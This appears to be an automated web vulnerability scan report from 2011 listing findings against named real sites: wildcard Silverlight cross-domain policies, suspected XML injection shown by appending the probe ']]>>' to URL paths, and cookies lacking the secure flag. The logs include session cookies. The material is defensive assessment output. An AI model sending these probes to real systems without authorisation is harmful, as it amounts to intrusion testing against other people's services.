Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: spe.atdmt.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 312 Allow: GET Expires: Mon, 02 May 2011 08:07:20 GMT Date: Tue, 26 Apr 2011 18:36:13 GMT Connection: close
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 348 Content-Type: text/xml Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT ETag: 3B4046BBE5F127E45C1A35A93B86C3890000015C P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Date: Tue, 26 Apr 2011 18:36:37 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-04-26T18%3a36%3a36; expires=Fri, 06-May-2011 18:36:36 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=50545F5A8928421BB01BB0B19336B7AC; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1744956&MS=1744956; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=FEBA9C7121224C53B980FC7F5CE2D208; expires=Thu, 25-Apr-2013 18:36:36 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110426; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: data.moneycentral.msn.com
Response
HTTP/1.1 200 OK Content-Length: 2066 Content-Type: text/xml Last-Modified: Fri, 08 Apr 2011 00:17:04 GMT Accept-Ranges: bytes ETag: "2eb2dc4982f5cb1:6fa2" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 18:36:17 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: money.msn.com
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/xml; charset=utf-8 Last-Modified: Wed, 08 Dec 2010 00:00:36 GMT ETag: "5fc3edf06a96cb1:803" Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM06 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:34 GMT Connection: keep-alive Content-Length: 706
The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: moneycentral.msn.com
Response
HTTP/1.1 200 OK Content-Length: 821 Content-Type: text/xml Last-Modified: Thu, 07 Apr 2011 22:00:07 GMT Accept-Ranges: bytes ETag: "6d6573286ff5cb1:168f5" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 18:36:13 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: services.money.msn.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 29 Mar 2011 23:21:38 GMT Accept-Ranges: bytes ETag: "06d75d68eecb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 18:36:13 GMT Connection: close Content-Length: 649
<input value="" type="password" title="Your password is case sensitive and must be between 4 and 25 characters long." style="width:142px;" name="/atg/userprofiling/ProfileFormHandler.value.password"><input value=" " type="hidden" name="_D:/atg/userprofiling/ProfileFormHandler.value.password"> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /favicon.ico]]>> HTTP/1.1 Host: freemanco.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:08:59 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1053
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /anywhere.js]]>>?id=3VXxrl7e9B3f66ejq9xow&v=1&ver=1 HTTP/1.1 Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://moxieinsight.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550
Response
HTTP/1.1 404 Not Found Content-Type: application/xml Content-Length: 280 Date: Tue, 26 Apr 2011 21:03:24 GMT Connection: close
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>anywhere.js]]>></Key><RequestId>43A34E986909F87A</RequestId><HostId>d ...[SNIP]...
The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /quoteservice/streaming?format=json]]>>&symbol=EURUSD,%20GBPUSD,%20USDJPY,&callback=jsonp1303842964760 HTTP/1.1 Host: services.money.msn.com Proxy-Connection: keep-alive Referer: http://money.msn.com/market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37
<?xml version="1.0" encoding="utf-8"?><root><result><DynamicSymbology><Symbol>EURUSD</Symbol><CompanyName>Euro to US Dollar</CompanyName><Country>US</Country><Type>CurrencyExchange</Type></DynamicSymb ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /k]]>>/bpi7eqn-e.css?3bb2a6e53c9684ffdc9a9bf1135b2a62ecbeaca761fbe87f15aec123ab5093d026e6e1bb0d1ae7cef0cb4486ee99fc9c314d37b0c3e12286285b50bf357d600e4ecf2b4738aa7af9c135b2c105695ad3dd623449abf994d967461f6b4da1162454ed7f3aa00e56b7b2be79831a77ecd09428a672695e1a56a6d92392e4138295c64b8e8e4674fd339a538359c9fa05ea31d66dd5d81e07aa24a5916f02c4dfc3ff68716d18da38b53004367a7a6a526281673d HTTP/1.1 Host: use.typekit.com Proxy-Connection: keep-alive Referer: http://moxieinsight.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Cache-Control: max-age=300 Content-Type: text/html Date: Tue, 26 Apr 2011 21:07:13 GMT Expires: Tue, 26 Apr 2011 21:12:13 GMT Server: EOS (lax001/54D6) Content-Length: 345
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /k/bpi7eqn-e.css]]>>?3bb2a6e53c9684ffdc9a9bf1135b2a62ecbeaca761fbe87f15aec123ab5093d026e6e1bb0d1ae7cef0cb4486ee99fc9c314d37b0c3e12286285b50bf357d600e4ecf2b4738aa7af9c135b2c105695ad3dd623449abf994d967461f6b4da1162454ed7f3aa00e56b7b2be79831a77ecd09428a672695e1a56a6d92392e4138295c64b8e8e4674fd339a538359c9fa05ea31d66dd5d81e07aa24a5916f02c4dfc3ff68716d18da38b53004367a7a6a526281673d HTTP/1.1 Host: use.typekit.com Proxy-Connection: keep-alive Referer: http://moxieinsight.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Cache-Control: max-age=300 Content-Type: text/html Date: Tue, 26 Apr 2011 21:07:17 GMT Expires: Tue, 26 Apr 2011 21:12:17 GMT Server: EOS (lax001/54E5) Content-Length: 345
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bertelsmann_corp]]>>/wms41/xml/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:41:16 GMT Server: Apache/2.2.15 (Fedora) Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /bertelsmann_corp]]>>/wms41/xml/headerflash_config.xml.php was not found on this server.</p> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bertelsmann_corp/wms41]]>>/xml/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:41:23 GMT Server: Apache/2.2.15 (Fedora) Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /bertelsmann_corp/wms41]]>>/xml/headerflash_config.xml.php was not found on this server.</p> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bertelsmann_corp/wms41/xml]]>>/headerflash_config.xml.php?id=96|en|1303856364 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:41:29 GMT Server: Apache/2.2.15 (Fedora) Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /bertelsmann_corp/wms41/xml]]>>/headerflash_config.xml.php was not found on this server.</p> ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bertelsmann_corp/wms41/xml/headerflash_config.xml.php]]>>?id=96|en|1303856364 HTTP/1.1 Host: www.bertelsmann.com Proxy-Connection: keep-alive Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/flash/header.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f; BMAG=c7cfc5db59ce8b34adc716fd06765f0b
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 22:41:35 GMT Server: Apache/2.2.15 (Fedora) Content-Length: 261 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /bertelsmann_corp/wms41/xml/headerflash_config.xml.php]]>> was not found on this server.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /freemanco]]>>?fs=true&_requestid=118715 HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:13:05 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1184
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /freemanco]]>>/?fs=true&_requestid=118715 HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:11:20 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1184
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:50:15 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1268
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:51:21 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1057
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /store]]>>?from=freemanco HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:13:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1184
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /store]]>>/?from=freemanco HTTP/1.1 Host: www.freemanco.com Proxy-Connection: keep-alive Referer: http://freemanco.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1
Response
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:13:02 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1184
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 404 Not Found Date: Tue, 26 Apr 2011 20:13:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28 Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1268
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
10. SSL cookie without secure flag setpreviousnext There are 15 instances of this issue:
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /s.nl?c=1142057&n=1&sc=4&ck=rcHW8655AeSHwA-v&vid=rcHW8655Ac-HwJur&cktime=96686&cart=776158&gc=clear&ext=F&whence= HTTP/1.1 Host: checkout.netsuite.com Connection: keep-alive Referer: http://www.magellangps.com/s.nl?sc=3&whence=&custcol_celigo_serialno= Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken= HTTP/1.1 Host: myaccount.west.thomson.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> My Account-West&n ...[SNIP]...
